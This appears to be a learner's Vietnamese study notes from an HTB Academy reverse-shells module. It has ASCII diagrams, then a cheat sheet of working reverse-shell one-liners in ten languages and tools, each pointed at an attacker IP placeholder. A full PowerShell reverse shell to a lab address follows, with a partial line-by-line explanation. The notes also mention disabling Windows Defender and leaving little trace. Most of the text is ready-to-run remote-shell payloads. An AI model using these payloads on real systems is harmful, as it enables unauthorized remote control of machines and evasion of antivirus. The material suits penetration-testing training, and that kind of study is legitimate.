

                        Reverse Shells (HTB Academy)
                                     │
        ┌────────────────────────────┼────────────────────────────┐
        │                            │                            │
   1. Shell Basics              2. Reverse Shells Chi Tiết    3. Công Cụ & Payloads
        │                            │                            │
   ┌────┴────┐                 ┌─────┴─────┐                 ┌────┴──────────┐
   │         │                 │           │                 │                │
Bind Shell  Reverse Shell   Listener   Ưu điểm           Cheat Sheets      Netcat
   │         │              (attack)   │                  (Payloads…)       │
   │         │                         │                                   ┌─┴─┐
   │         └── Target connect    - Outbound ít bị chặn                    │   │
   │             ngược về          - Khó phát hiện nếu không DPI        Listener Upload binary
   │                                                                     (Linux) (Windows khó)
   │
   └── Target mở port                                           Living off the land
       Attacker inbound                                         ┌───────────┬───────────┐
                                                               cmd.exe   PowerShell




                       4. Reverse Shell trên Windows
                                     │
                    ┌────────────────┴───────────────┐
                    │                                │
            Attack box                        Target (Windows)
           ┌───────────┐                     ┌───────────┐
           │ nc -lvnp 443│                   │ Payload PS │
           └───────────┘                     │ powershell -nop ... TCPClient │
                                             └───────────┘
                                                  │
                      ┌───────────────────────────┴─────────────────────────┐
                      │                                                     │
              Antivirus chặn                                       Khi thành công
              (Windows Defender)                                    - Connection received
              → Disable AV                                          - Run lệnh whoami, dir



Reverse Shell Payloads Cheat Sheet

1. Netcat (nc)
-----------------
# Linux
nc -e /bin/sh <ATTACKER_IP> <PORT>
nc -c /bin/sh <ATTACKER_IP> <PORT>

# Nếu bản nc không hỗ trợ -e
mkfifo /tmp/f; nc <ATTACKER_IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1


2. Bash
-----------------
bash -i >& /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1


3. Python
-----------------
python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("<ATTACKER_IP>",<PORT>));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh"])'


4. PHP
-----------------
php -r '$sock=fsockopen("<ATTACKER_IP>",<PORT>);
exec("/bin/sh -i <&3 >&3 2>&3");'


5. Perl
-----------------
perl -e 'use Socket;$i="<ATTACKER_IP>";$p=<PORT>;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


6. Ruby
-----------------
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<ATTACKER_IP>","<PORT>");
while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'


7. PowerShell (Windows)
-----------------
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<ATTACKER_IP>',<PORT>);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()}"


8. Java
-----------------
r = Runtime.getRuntime()
p = r.exec(["/bin/sh","-c","exec 5<>/dev/tcp/<ATTACKER_IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])


9. Socat
-----------------
socat TCP:<ATTACKER_IP>:<PORT> EXEC:/bin/sh


10. Node.js
-----------------
(function(){
 var net = require("net"),
   cp = require("child_process"),
   sh = cp.spawn("/bin/sh", []);
 var client = new net.Socket();
 client.connect(<PORT>, "<ATTACKER_IP>", function(){
   client.pipe(sh.stdin);
   sh.stdout.pipe(client);
   sh.stderr.pipe(client);
 });
})();











=============================


Tự note 

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Giải thích chi tiết

powershell -nop -c
  -nop: không tải profile (NoProfile) → chạy nhanh, ít dấu vết.
  -c: chỉ định thực thi lệnh theo sau.

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);
  Tạo một TCP client kết nối tới IP attacker 10.10.14.158 port 443.
  Đây chính là reverse connection.

$stream = $client.GetStream();
  Lấy luồng dữ liệu (stream) từ kết nối TCP.

[byte[]]$bytes = 0..65535|%{0};
  Tạo một buffer mảng byte để nhận dữ liệu từ attacker.

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){...}
  Vòng lặp chờ nhận dữ liệu từ attacker.

$i là số byte nhận được.

Bên trong vòng lặp

Chuyển dữ liệu bytes → string:
